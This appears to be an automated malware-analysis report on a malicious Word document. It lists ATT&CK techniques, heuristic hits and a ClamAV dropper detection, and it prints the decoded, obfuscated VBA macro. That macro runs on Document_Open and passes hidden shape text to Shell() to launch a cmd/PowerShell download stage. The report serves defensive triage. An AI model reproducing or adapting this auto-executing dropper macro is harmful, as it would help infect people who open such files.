Verdict: MALICIOUS
Risk Score: 270

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The file contains a VBA macro that triggers on document open, utilizing the Shell() function to execute a command. This command appears to construct and run a PowerShell command, indicated by the 'SC_STR_POWERSHELL' heuristic and the presence of 'cmd.exe /c' in the document body. The macro's intent is to download and execute a second-stage payload, as suggested by the 'Doc.Dropper.Prince-6923163-0' ClamAV detection and the 'OLE_VBA_SHELL' heuristic. The specific command construction is obfuscated but points to dynamic payload retrieval.
Heuristics (8)

- ClamAV: Doc.Dropper.Prince-6923163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Prince-6923163-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script: `FormatNumber DnrVa + UURdi + pZSnq + kdGwCi * nPFjV + OaCkz + Ibjifd + lpJwP` / `TmwpHkQustK = VBA.Shell(Shapes(jDPSK + tAvQCib + 1 + iCPFWD + wZvjlf).TextFrame.TextRange.Text + IAAiq + dRPpb, PnUoiCsciGL)` / `End Function`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script: `End Function` / `Private Sub Document_open()` / `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2355 bytes |

SHA-256 of macros.bas: 88303abffa1d585958bef878663f7524a43865a1038f758a4be0c283cbf45f34

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "njoktEkEwprpu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GEUciTEPRiz()
On Error Resume Next
' All uninitialized names below evaluate to 0; the arithmetic is junk padding
Const PnUoiCsciGL = 690563030 - 690563030
TimeValue (OdfSu + itYop + rvCUim + FjlGBQ / (CIpXOt + vOQou))
FormatNumber qUNsIQ + VYYuN * (QUnVj + rEwzn + nwrsuO + omcdC - (DAuCPz + XiPVjf))
TimeValue DwsXu + mYhXbb + PviNii + wQdLQ - (XoYuk + fqXBUJ)
FormatNumber (wvJvHk + UmpOo + UPjnoT + iJEvb / dwKdR + ErKSRH + PanoqT + iEVGWJ / YwprOT + GMKJXZ - DKzRjL + cuUNb + jZbEHH + jvUaDn)
FormatNumber DnrVa + UURdi + pZSnq + kdGwCi * nPFjV + OaCkz + Ibjifd + lpJwP
' The command line is read from the text of a shape in the document (Shapes(1)) and passed to Shell() with window style 0 (hidden)
TmwpHkQustK = VBA.Shell(Shapes(jDPSK + tAvQCib + 1 + iCPFWD + wZvjlf).TextFrame.TextRange.Text + IAAiq + dRPpb, PnUoiCsciGL)
End Function
' Auto-executes when the document is opened
Private Sub Document_open()
On Error Resume Next
TimeValue TzDtls + cmQrd + LKZfz + ZbEwo * jQzLOj + sUuoh / (DAsVS + iQjGh + FuwXEP + PJCbE)
FormatNumber NQBiJQ + TZHQEO + jbOczt + qJahE * (HzGFqH + mwTsC)
TimeValue qUltKr + VidCq + kFEIU + Luhbu / vwloGN + cFjbv - (VsmmRW + AMVXMH + PlwIt + MOujhb)
FormatNumber (wzEcau + SsRksL)
FormatDateTime (vMosp + ffTRFc - (SXGaw + lsVSC + wLumH + ZIYOi - isczb + oAOllP))
TimeValue (uvkIX + vQumO + odLVv + HACMzU / LHPIcN + BSGOIu + jKKYp + wpWRsw / wwLiz + aLvfH)
FormatDateTime VNJLJ + mOjQVU / VOwHqG + iZcAoH + WUwCwj + JtCci / (aSbIS + AdNsjE)
FormatDateTime (YcGCL + UKmpZz / jnMok + wAliDf + GOwzwj + ZVOYrF - (UKvjz + LkBpmm + wKmzCW + iGMost / hLZoz + wbqqvD))
FormatNumber wKTnXN + itOhu / (WPKtUt + Xbfit - (jVOIZM + Iwcsb + riAklW + DdTDX + (BYSWi + uritQl + ViYZnS + pCaWq)))
FormatDateTime YkhQWr + uOjGl + FTzJST + oWVPf / (SMBZoD + iKfBpL / (vAiqwd + KpCSm + OsCPSl + ZwtosD))
FormatNumber (vnzUG + NonfR - VIXwH + FjmHQ) * (EbawGt + umLOCE + fiADOk + iNRZu)
' Calls the function containing the Shell() invocation
GEUciTEPRiz
FormatNumber ObMsi + zkqZW + BEHOfK + RzuIS / jridk + KaPjDA + ObpqM + iNjNTI * FBJQT + ujuJT + GdLAl + DNbvZ
FormatDateTime nccDiE + zMUAQJ * AnLNB + ufNwtd / aCEBnh + bXDPC
TimeValue VVXzM + Ybqrn + alWkw + fIBEH * RtTtl + DGQiaT + UfvjVG + vopop / (hqmQN + OzjTh)
TimeValue (LohsvL + kilkc)
End Sub
```